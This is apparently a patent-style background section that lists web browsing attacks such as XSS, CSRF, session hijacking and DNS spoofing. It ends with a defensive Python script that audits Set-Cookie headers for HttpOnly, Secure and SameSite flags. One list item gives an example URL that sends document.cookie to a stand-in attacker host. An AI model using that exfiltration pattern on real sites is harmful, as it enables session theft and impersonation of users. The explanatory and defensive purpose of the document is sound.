Communicating online, for example by web browsing, is fraught with peril. Various entities attack users, with motivations such as financial gain, fame, notoriety, or maliciousness.
In some ways attackers are considered to have the upper hand, because an attacker only needs to exploit one specific vulnerability whereas security software needs to protect against myriad combinations of attacks. Often attackers exploit the weakest link.
In an online communications environment (such as web browsing), users face a variety of issues such as security flaws, holes, or vulnerabilities, for example:
- Cross-site scripting (XSS) or related attacks
- Cross-site request forgery (CSRF) or related attacks
- Session and/or transaction hijacking related attacks
- JavaScript used to send a Hypertext Transfer Protocol (HTTP) cookie to an unintended destination or website (e.g. http://maliciousattacker.example.com/cgi-bin/collectCookies?val=document.cookie). This information may then be used for nefarious purposes such as impersonating the user.
- A malicious site manipulates a client application (such as a web browser) to send data and/or requests to an honest site such as a bank
- An attack is masked to evade detection by encoding information. Multiple encodings may be combined or layered.
- Underlying address information is manipulated (for example through DNS hijacking, Domain Name System (DNS) spoofing, DNS cache poisoning, ARP poisoning, or an evil twin router) to transparently redirect data and/or requests to a destination where an attacker can access the data
- Causing the release of sensitive data to unintended and/or malicious destination(s)
- Causing the release of sensitive data to pass through or within reach of malicious network(s)
- CSRF attacks used to perform unintended operations. CSRF attacks may be delivered to the user through a web page, email, RSS/Atom feed, or the like
- CSRF attacks can be performed in drive-by fashion and cause client applications (such as web browsers) to perform an operation or request with an honest destination
- CSRF attacks on a user's router. For example, many WiFi router administrator interfaces provide a web interface; an attacker could cause a request or operation to be performed on a router
- Manipulation of a user's network traffic or online communications, such as redirects, router hijacking, or the like
- Manipulation of data or traffic, such as surfjacking, sidejacking, or similar attacks
- Manipulation of a user's mouse movements or unintended following of links (such as clickjacking)
- Blocking of logout requests (such as intercepting specific requests, or stripping out scripts designed to clear or delete cookies, etc.)
- Entities are manipulated or tricked into transmitting data that was intended to be transmitted only over a secure communication channel (such as SSL/TLS) over less secure communication channels instead. For example, surfjacking attacks.
- Sniffing and replaying HTTP cookies or session data. For example, sidejacking attacks.
- Injection of traffic on a user's network, such as injection of HTTP packets to manipulate data or traffic
- Any other malicious trojan or malware
Additionally, one or more of the attacks may be combined to further elude any security defenses. It may be difficult for users to recognize or understand these attacks since the underlying technology is somewhat opaque and technical in nature. The attacks can also be carried out relatively transparently, and the user may not notice anything for some period of time (e.g. until the user examines their financial institution statements). Detecting the attacks may also require non-trivial effort from users to inspect some or all of their traffic.
An attacker may not need access to a user's credentials (such as a username and password) if they can instead control or monitor the web browser.
Users may face difficulty in securing themselves from one or more of the above-mentioned attacks, holes, flaws, or vulnerabilities. Even if users receive training, the technical details may still be difficult to overcome.
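Several items in the list above (JavaScript sending document.cookie to an unintended site, sniffing and replaying cookies, cookies leaking onto non-TLS channels, CSRF) depend on how a session cookie is scoped. The following is an added example, not part of the original text, that audits Set-Cookie header values for the standard HttpOnly, Secure and SameSite attributes; the function names and sample headers are constructed for illustration.

```python
# Added example: audit Set-Cookie headers for the cookie exposures listed above.
# SAMPLE_HEADERS is constructed sample data, not captured traffic.

EXPOSURES = {
    "script-readable": "no HttpOnly: page JavaScript can read it via document.cookie",
    "cleartext": "no Secure: also sent over plain HTTP, where it can be sniffed and replayed",
    "cross-site": "no SameSite=Lax/Strict: may ride on requests started by another site (CSRF)",
}

SAMPLE_HEADERS = [
    "SESSIONID=abc123; Path=/",
    "SESSIONID=abc123; Path=/; Secure; HttpOnly; SameSite=Strict",
    "prefs=dark; Expires=Wed, 01 Jan 2031 00:00:00 GMT; secure; SameSite=None",
]


def parse_set_cookie(header):
    """Split one Set-Cookie value into (cookie name, attributes keyed in lowercase)."""
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].partition("=")[0].strip()
    attrs = {}
    for part in parts[1:]:
        if part:
            key, _, value = part.partition("=")
            attrs[key.strip().lower()] = value.strip()
    return name, attrs


def audit_cookie(header):
    """Return the exposure codes (keys of EXPOSURES) that apply to one cookie."""
    _, attrs = parse_set_cookie(header)
    findings = []
    if "httponly" not in attrs:
        findings.append("script-readable")
    if "secure" not in attrs:
        findings.append("cleartext")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("cross-site")
    return findings


if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        name, _ = parse_set_cookie(header)
        codes = audit_cookie(header)
        print(name, "->", "ok" if not codes else "")
        for code in codes:
            print("   ", code + ":", EXPOSURES[code])
```

Attribute names are matched case-insensitively, and a cookie with no explicit SameSite value is reported because not every client applies a restrictive default.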